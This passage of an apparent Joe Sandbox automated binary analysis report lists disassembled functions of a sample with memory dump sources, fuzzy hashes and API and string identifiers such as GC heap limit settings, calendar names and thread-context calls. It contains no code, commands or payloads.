                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.6841338609.00007FF72F727000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.6841338609.00007FF72F72C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.6841441464.00007FF72F72F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_0_2_7ff72f5a0000_kHslwiV2w6.jbxd
                                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                                  • API ID:
                                                                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                                                                  • API String ID:
                                                                                                                                                                                                                                                                                  • Opcode ID: 34987ce44795b5176388c7297ef07e80ac88c18db829327b6e44d208054dc68d
                                                                                                                                                                                                                                                                                  • Instruction ID: 4afc726e30c841459c796ba53706d8a7b973db7369635d242febb06d386e6ba7
                                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 34987ce44795b5176388c7297ef07e80ac88c18db829327b6e44d208054dc68d
                                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 2D11C423B0628289E615BE12BC811F9D716FF957D1F948435EF1C4BB85CE3CD4918710
                                                                                                                                                                                                                                                                                  Function 00007FF72F62F9C0 Relevance: .0, Instructions: 46COMMON
                                                                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                                  • Source File: 00000000.00000002.6840952422.00007FF72F5A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF72F5A0000, based on PE: true
                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.6840916799.00007FF72F5A0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.6841158411.00007FF72F689000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.6841235738.00007FF72F6BA000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.6841338609.00007FF72F721000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.6841338609.00007FF72F727000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.6841338609.00007FF72F72C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.6841441464.00007FF72F72F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_0_2_7ff72f5a0000_kHslwiV2w6.jbxd
                                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                                  • API ID:
                                                                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                                                                  • API String ID:
                                                                                                                                                                                                                                                                                  • Opcode ID: fd73dc21319d55d5cd51ae119c2cd724b2eedb2a74dd1c6a194b4a6c8a9077be
                                                                                                                                                                                                                                                                                  • Instruction ID: 42c4e7025837a358b9ab8006ff6d2fc433597793c2389d3b6580408b15fe21cd
                                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: fd73dc21319d55d5cd51ae119c2cd724b2eedb2a74dd1c6a194b4a6c8a9077be
                                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: AAF03000F0A08646F80CBA735C162FAD267EF97B80FA06830EA1D1FB87DC2C94120B65
                                                                                                                                                                                                                                                                                  Function 00007FF72F62FAA0 Relevance: .0, Instructions: 25COMMON
                                                                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                                  • Source File: 00000000.00000002.6840952422.00007FF72F5A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF72F5A0000, based on PE: true
                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.6840916799.00007FF72F5A0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.6841158411.00007FF72F689000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.6841235738.00007FF72F6BA000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.6841338609.00007FF72F721000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.6841338609.00007FF72F727000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.6841338609.00007FF72F72C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.6841441464.00007FF72F72F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_0_2_7ff72f5a0000_kHslwiV2w6.jbxd
                                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                                  • API ID:
                                                                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                                                                  • API String ID:
                                                                                                                                                                                                                                                                                  • Opcode ID: bb870c6da8980ab108728cb2512e603d96d3e36e6137f51798ee13c9ceab7c4e
                                                                                                                                                                                                                                                                                  • Instruction ID: 67474a926c693726e1dd0f3763818d8e29ef2fdbfecfa8d583316b9a3708541c
                                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: bb870c6da8980ab108728cb2512e603d96d3e36e6137f51798ee13c9ceab7c4e
                                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: EAE04F04F1A18746F90CBA625C662FAE167EF96B40FA41430EA1E1BB93DE2CA4114B60
                                                                                                                                                                                                                                                                                  Function 00007FF72F619FC0 Relevance: .0, Instructions: 19COMMON
                                                                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                                  • Source File: 00000000.00000002.6840952422.00007FF72F5A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF72F5A0000, based on PE: true
                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.6840916799.00007FF72F5A0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.6841158411.00007FF72F689000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.6841235738.00007FF72F6BA000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.6841338609.00007FF72F721000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.6841338609.00007FF72F727000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.6841338609.00007FF72F72C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.6841441464.00007FF72F72F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_0_2_7ff72f5a0000_kHslwiV2w6.jbxd
                                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                                  • API ID:
                                                                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                                                                  • API String ID:
                                                                                                                                                                                                                                                                                  • Opcode ID: 334c71db2373eca22ed1fe030cc8b17200d83776fff50a61cfaf6ec7c3de23df
                                                                                                                                                                                                                                                                                  • Instruction ID: 95726ec84d8e6089dda3b913844efc14a9414fc79767effbb47b4a742d68eca9
                                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 334c71db2373eca22ed1fe030cc8b17200d83776fff50a61cfaf6ec7c3de23df
                                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 46D05E04F2509A00EC047A234C250F6C165AF46FC0DD42030ED0E2BB96DD0C95124B58
                                                                                                                                                                                                                                                                                  Function 00007FF72F6090A0 Relevance: 33.4, APIs: 9, Strings: 10, Instructions: 136COMMON
                                                                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                                  • Source File: 00000000.00000002.6840952422.00007FF72F5A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF72F5A0000, based on PE: true
                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.6840916799.00007FF72F5A0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.6841158411.00007FF72F689000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.6841235738.00007FF72F6BA000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.6841338609.00007FF72F721000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.6841338609.00007FF72F727000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.6841338609.00007FF72F72C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.6841441464.00007FF72F72F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_0_2_7ff72f5a0000_kHslwiV2w6.jbxd
                                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                                  • API ID: _stricmp
                                                                                                                                                                                                                                                                                  • String ID: buddhist$calendar$dangi$gregorian$hebrew$islamic$islamic-umalqura$japanese$persian$roc
                                                                                                                                                                                                                                                                                  • API String ID: 2884411883-3649728362
                                                                                                                                                                                                                                                                                  • Opcode ID: 5c4252158990072a2c8dbf7d618486f637b8a275c6e4f6a82dc01d2d222f2064
                                                                                                                                                                                                                                                                                  • Instruction ID: 6cacc709760fe9881fa6fec594538fb5df6998d9049bdbc0ef4bef4dd3990859
                                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 5c4252158990072a2c8dbf7d618486f637b8a275c6e4f6a82dc01d2d222f2064
                                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 61514C25B1C6C351FA10AB19EE207F5E39AFF98784FD1203ADC0E46791EE6DE4458B60
                                                                                                                                                                                                                                                                                  Function 00007FF72F5AC1A0 Relevance: 24.1, APIs: 8, Strings: 8, Instructions: 101stringCOMMON
                                                                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                                                  • strcmp.API-MS-WIN-CRT-STRING-L1-1-0(?,?,?,00007FF72F5B2967,?,?,?,?,00007FF72F5AB845), ref: 00007FF72F5AC1DE
                                                                                                                                                                                                                                                                                  • strcmp.API-MS-WIN-CRT-STRING-L1-1-0(?,?,?,00007FF72F5B2967,?,?,?,?,00007FF72F5AB845), ref: 00007FF72F5AC206
                                                                                                                                                                                                                                                                                  • strcmp.API-MS-WIN-CRT-STRING-L1-1-0(?,?,?,00007FF72F5B2967,?,?,?,?,00007FF72F5AB845), ref: 00007FF72F5AC226
                                                                                                                                                                                                                                                                                  • strcmp.API-MS-WIN-CRT-STRING-L1-1-0(?,?,?,00007FF72F5B2967,?,?,?,?,00007FF72F5AB845), ref: 00007FF72F5AC246
                                                                                                                                                                                                                                                                                  • strcmp.API-MS-WIN-CRT-STRING-L1-1-0(?,?,?,00007FF72F5B2967,?,?,?,?,00007FF72F5AB845), ref: 00007FF72F5AC266
                                                                                                                                                                                                                                                                                  • strcmp.API-MS-WIN-CRT-STRING-L1-1-0(?,?,?,00007FF72F5B2967,?,?,?,?,00007FF72F5AB845), ref: 00007FF72F5AC28A
                                                                                                                                                                                                                                                                                  • strcmp.API-MS-WIN-CRT-STRING-L1-1-0(?,?,?,00007FF72F5B2967,?,?,?,?,00007FF72F5AB845), ref: 00007FF72F5AC2AE
                                                                                                                                                                                                                                                                                  • strcmp.API-MS-WIN-CRT-STRING-L1-1-0(?,?,?,00007FF72F5B2967,?,?,?,?,00007FF72F5AB845), ref: 00007FF72F5AC2D2
                                                                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                                  • Source File: 00000000.00000002.6840952422.00007FF72F5A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF72F5A0000, based on PE: true
                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.6840916799.00007FF72F5A0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.6841158411.00007FF72F689000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.6841235738.00007FF72F6BA000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.6841338609.00007FF72F721000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.6841338609.00007FF72F727000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.6841338609.00007FF72F72C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.6841441464.00007FF72F72F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_0_2_7ff72f5a0000_kHslwiV2w6.jbxd
                                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                                  • API ID: strcmp
                                                                                                                                                                                                                                                                                  • String ID: GCHeapHardLimit$GCHeapHardLimitLOH$GCHeapHardLimitLOHPercent$GCHeapHardLimitPOH$GCHeapHardLimitPOHPercent$GCHeapHardLimitPercent$GCHeapHardLimitSOH$GCHeapHardLimitSOHPercent
                                                                                                                                                                                                                                                                                  • API String ID: 1004003707-945519297
                                                                                                                                                                                                                                                                                  • Opcode ID: bd652d5be0480d2eb31566d04321b99b92d141b06253939b4d1c7caa1d773059
                                                                                                                                                                                                                                                                                  • Instruction ID: 0cebea3af1509fc5ccde3a3fd6a9b6c138553ff6045d1298c0b9a4f4b861d2d4
                                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: bd652d5be0480d2eb31566d04321b99b92d141b06253939b4d1c7caa1d773059
                                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 97411A14B096C281EA50BB169D145F4D292FF05BF4FC80331D87D977D9EE6CE8528A60
                                                                                                                                                                                                                                                                                  Function 00007FF72F5AB3B0 Relevance: 14.1, APIs: 6, Strings: 2, Instructions: 84libraryloaderCOMMON
                                                                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                                  • Source File: 00000000.00000002.6840952422.00007FF72F5A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF72F5A0000, based on PE: true
                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.6840916799.00007FF72F5A0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.6841158411.00007FF72F689000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.6841235738.00007FF72F6BA000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.6841338609.00007FF72F721000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.6841338609.00007FF72F727000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.6841338609.00007FF72F72C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.6841441464.00007FF72F72F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_0_2_7ff72f5a0000_kHslwiV2w6.jbxd
                                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                                  • API ID: ContextInitialize$AddressEnabledErrorFeaturesHandleLastModuleProcState
                                                                                                                                                                                                                                                                                  • String ID: InitializeContext2$kernel32.dll
                                                                                                                                                                                                                                                                                  • API String ID: 4102459504-3117029998
                                                                                                                                                                                                                                                                                  • Opcode ID: bf7d35e48df714c612ab66266faaa2ff6652ce620ea3f11c073d427a00be551f
                                                                                                                                                                                                                                                                                  • Instruction ID: 8b3710eeae5ce11e02066dae699554897b760ea4dbf0521ef5c05ad00546148f
                                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: bf7d35e48df714c612ab66266faaa2ff6652ce620ea3f11c073d427a00be551f
                                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: B6315E25B09B8692EA10AB55ED402B9E392FF48790FC80435DD4D46754DF7CE496CB60
                                                                                                                                                                                                                                                                                  Function 00007FF72F5A4E90 Relevance: 14.1, APIs: 6, Strings: 2, Instructions: 83threadlibraryloaderCOMMON
                                                                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                                  • Source File: 00000000.00000002.6840952422.00007FF72F5A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF72F5A0000, based on PE: true
                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.6840916799.00007FF72F5A0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.6841158411.00007FF72F689000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.6841235738.00007FF72F6BA000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.6841338609.00007FF72F721000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.6841338609.00007FF72F727000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.6841338609.00007FF72F72C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.6841441464.00007FF72F72F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_0_2_7ff72f5a0000_kHslwiV2w6.jbxd
                                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                                  • API ID: Thread$AddressContextErrorLastLibraryLoadProcResumeSuspend
                                                                                                                                                                                                                                                                                  • String ID: QueueUserAPC2$kernel32
                                                                                                                                                                                                                                                                                  • API String ID: 3714266957-4022151419
                                                                                                                                                                                                                                                                                  • Opcode ID: bc70cecf5c74af7520f56920f6343e2be3003b4f5f30e659a0aacf61ab6d3dce
                                                                                                                                                                                                                                                                                  • Instruction ID: db07b237ba134ce52106eb4175bcc46f183790d812037fd70dfbb3839f58d29c
                                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: bc70cecf5c74af7520f56920f6343e2be3003b4f5f30e659a0aacf61ab6d3dce
                                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 93319024B09AC281FA10AB16ED403F9A3A1FF45BA4FC40234CD6D46BE4DE6DE4168F60
                                                                                                                                                                                                                                                                                  Function 00007FF72F5CBC40 Relevance: 9.2, APIs: 6, Instructions: 180COMMON
                                                                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                                  • Source File: 00000000.00000002.6840952422.00007FF72F5A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF72F5A0000, based on PE: true
                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.6840916799.00007FF72F5A0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.6841158411.00007FF72F689000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.6841235738.00007FF72F6BA000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.6841338609.00007FF72F721000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.6841338609.00007FF72F727000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.6841338609.00007FF72F72C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.6841441464.00007FF72F72F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_0_2_7ff72f5a0000_kHslwiV2w6.jbxd
                                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                                  • API ID:
                                                                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                                                                  • API String ID:
                                                                                                                                                                                                                                                                                  • Opcode ID: fe6e69181591d6301f79addf1851dae84baba91a0e20fc1957c0ed45eea2809c
                                                                                                                                                                                                                                                                                  • Instruction ID: 76c0bd99e676e1764514a802d66eceb786d4a19b4e1fbe91e67a1a06b12843dd
                                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: fe6e69181591d6301f79addf1851dae84baba91a0e20fc1957c0ed45eea2809c
                                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 1E718D21B09AC252FA54BF229D402F9E7A5EF54B94FD80035DA4E07B9ADF3CE4508B70
                                                                                                                                                                                                                                                                                  Function 00007FF72F5E0FE0 Relevance: 9.2, APIs: 6, Instructions: 151COMMON
                                                                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                                  • Source File: 00000000.00000002.6840952422.00007FF72F5A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF72F5A0000, based on PE: true
                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.6840916799.00007FF72F5A0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.6841158411.00007FF72F689000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.6841235738.00007FF72F6BA000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.6841338609.00007FF72F721000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.6841338609.00007FF72F727000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.6841338609.00007FF72F72C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.6841441464.00007FF72F72F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_0_2_7ff72f5a0000_kHslwiV2w6.jbxd
                                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                                  • API ID: BreakDebug
                                                                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                                                                  • API String ID: 456121617-0
                                                                                                                                                                                                                                                                                  • Opcode ID: 5d73b6675c1853df630bb6c88506b6e80ad5f9561737fbd2e3aae4c93d19f0ff
                                                                                                                                                                                                                                                                                  • Instruction ID: d02b3f9fc6c3be738bb64419179c8b1e7ca108d1cc144945238e950677f14f47
                                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 5d73b6675c1853df630bb6c88506b6e80ad5f9561737fbd2e3aae4c93d19f0ff
                                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 09519122B09AC296FA59AB52C8402FDE7A1FF84B94FC64135CA1D07391DE3CE581CB60
                                                                                                                                                                                                                                                                                  Function 00007FF72F5C2770 Relevance: 9.1, APIs: 6, Instructions: 132threadCOMMON
                                                                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                                  • Source File: 00000000.00000002.6840952422.00007FF72F5A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF72F5A0000, based on PE: true
                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.6840916799.00007FF72F5A0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.6841158411.00007FF72F689000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.6841235738.00007FF72F6BA000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.6841338609.00007FF72F721000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.6841338609.00007FF72F727000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.6841338609.00007FF72F72C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.6841441464.00007FF72F72F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_0_2_7ff72f5a0000_kHslwiV2w6.jbxd
                                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                                  • API ID: CriticalSectionSwitchThread$Leave$Enter
                                                                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                                                                  • API String ID: 1765607624-0
                                                                                                                                                                                                                                                                                  • Opcode ID: faad790ec28286bda2ef36a915e46beff94c7fcad6aaa131053e1d9cfa2025f0
                                                                                                                                                                                                                                                                                  • Instruction ID: 50e0d3976c5b6986738bee64c9488be3dd4661cc941cf211e8982ab324a4894e
                                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: faad790ec28286bda2ef36a915e46beff94c7fcad6aaa131053e1d9cfa2025f0
                                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 40513B34F0C6C386F654BF26AC415F5E291EF59B50FD54236E52E822E6CE2CB8419E70
                                                                                                                                                                                                                                                                                  Function 00007FF72F5E1DE0 Relevance: 9.1, APIs: 6, Instructions: 94COMMON
                                                                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                                                  • DebugBreak.KERNEL32(?,?,?,?,?,?,00007FF72F5E1FB1,?,?,000001ED04CFF520,00007FF72F5E14E2), ref: 00007FF72F5E1E89
                                                                                                                                                                                                                                                                                  • DebugBreak.KERNEL32(?,?,?,?,?,?,00007FF72F5E1FB1,?,?,000001ED04CFF520,00007FF72F5E14E2), ref: 00007FF72F5E1EA1
                                                                                                                                                                                                                                                                                  • DebugBreak.KERNEL32(?,?,?,?,?,?,00007FF72F5E1FB1,?,?,000001ED04CFF520,00007FF72F5E14E2), ref: 00007FF72F5E1EB9
                                                                                                                                                                                                                                                                                  • DebugBreak.KERNEL32(?,?,?,?,?,?,00007FF72F5E1FB1,?,?,000001ED04CFF520,00007FF72F5E14E2), ref: 00007FF72F5E1ED7
                                                                                                                                                                                                                                                                                  • DebugBreak.KERNEL32(?,?,?,?,?,?,00007FF72F5E1FB1,?,?,000001ED04CFF520,00007FF72F5E14E2), ref: 00007FF72F5E1EFC
                                                                                                                                                                                                                                                                                  • DebugBreak.KERNEL32 ref: 00007FF72F5E1F30
                                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                                  • Source File: 00000000.00000002.6840952422.00007FF72F5A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF72F5A0000, based on PE: true
                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.6840916799.00007FF72F5A0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.6841158411.00007FF72F689000.00000004.00000001.01000000.00000003.sdmpDownload File
